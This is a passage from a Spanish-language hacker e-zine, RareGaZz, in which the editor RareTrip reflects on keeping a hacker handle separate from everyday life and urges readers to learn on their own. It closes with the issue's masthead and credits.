persona y ser viviente que creo a raretrip no salgo a la calle vestido como
hacker y con una camiseta con mi handle en letras grandes. Raretrip permanece
guardado en mi cabeza mientras vivo la parte de mi persona humana, cuando
regreso en frente de mi computadora...raretrip aparece de nuevo.

Todos nosotros tenemos un ideal maximo o algo que nos gustaria llegar a ser;
pues para mi es raretrip. Por eso le doy vida y moldeo sus ideas. No para
hacerme elite o mejor. No pienso mejorar mi personalidad simplemente por ser
raretrip, ni tampoco ganar mas amigos por que ya soy elite. Es como el nerdo
que nunca tuvo amigos hasta que se quito los lentes...asi son los nuevos
hackers. Asi nunca he tratado de ser yo.

A todos ustedes les recomiendo esto:

-Olviden su handle en su vida cotidiana.- No seamos hackers para hacernos
famosos, no queremos ganar popularidad o fama siendo hackers. Eso si,
queremos ganar conocimiento - y claro, chicas guapas :-) -

-Tengan su vida aparte de la de su handle.- Algunas personas se asombran de
lo bien informado que estoy pero eso tiene una simple explicacion "No
siempre soy raretrip". Crees tu que si llego con alguien desconocido
diciendo 'hola, soy el editor de raregazz y miembro de RdK' me tratarian
mejor que si dijera 'hola, soy paco-gerte, me gustan las computadoras y
siento simpatia por las redes'. Ni por un momento. La gente tiende a
rechazarte si piensan que sabes mas que ellos, por eso olvida tu handle y
ten tu verdadera personalidad a mano. Entre mas personas conozcas usando tu
verdadera identidad mas informacion podras usar para tu handle, en mi caso,
raretrip.

-No se vendan a nadie.- Nunca copien las actitudes de ninguna persona, aqui
en raregazz nos podremos ver como las personas mas keewwl de i-net pero te
aseguro que si me vez en la calle no voltearias a verme, y seguramente yo
no voltearia a verte. Como te estas dando cuenta la imagen que tienes de mi
es por mis ideas y forma de pensar, no por ser elite o hacker. No quiero ser
heroe o enemigo de nadie simplemente por mi handle.

Yo conosco por fortuna a dos de mis mejores compa¤eros de hacking, pero no
siempre es asi. Si no conoces a los hackers con los que usualmente hablas
por email -creeme- es mejor. LePompeItor ha sido amigo mio desde hace tiempo,
entre los dos hemos hecho desmadre en borracheras y loqueras que solo
nosotros podemos llegar recordar, por eso hay aqui en raregazz un ambiente de
camaderia y no de competencia. Estan invitados a formar parte de este
ambiente todos los que quieran, no necesitan ser filosofos o expertos en
hacking, simplemente GANAS -MUCHAS GANAS- de aprender y estar atentos...

Espero a alguno de ustedes le sirva este peque¤o texto que inclui en este
numero sin avisarle a nadie. Creo es necesario que aparezcan hackers con
ideas propias, con inventiva, con ganas de buscar y aprender. No solo
aquellos que busquen 'recetas de cocina' para hacer esto o aquello. Las
personas que buscan ese tipo de recetas son, para mi, los lamerz.

RareTrip@Cyberdude.com
"If it moves, kiss it!"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==ÄÄ==
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


Hasta la proxima! Enjoy the sunrise, tomorrow may not be there...

! Editor: RareTrip
-$- Colaboradores: LePompeItor, Mr.X, KillerBot,
! * CrackSmoker y Psycho Tranze.
+ /^ | Perdedores: Kasparov.
! | |//^ _^_ De moda: Deep Blue.
/^ / @ | /_-_ Agradecimientos: (ver abajo)
|@ _| @ @|- - -| Nuestro odio: (ver arriba)
| | | /^ | _ | Wired: RareGaZz
|___/____|_|_|_(_)_| Tired: PcComputing, PcMagaZine, Link,
Internet World, PcMedia, etc.
Comentario: Nihil obstat & non plus ultra.

<<::RareGaZz::>>
"El Abogado del Diablo"

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT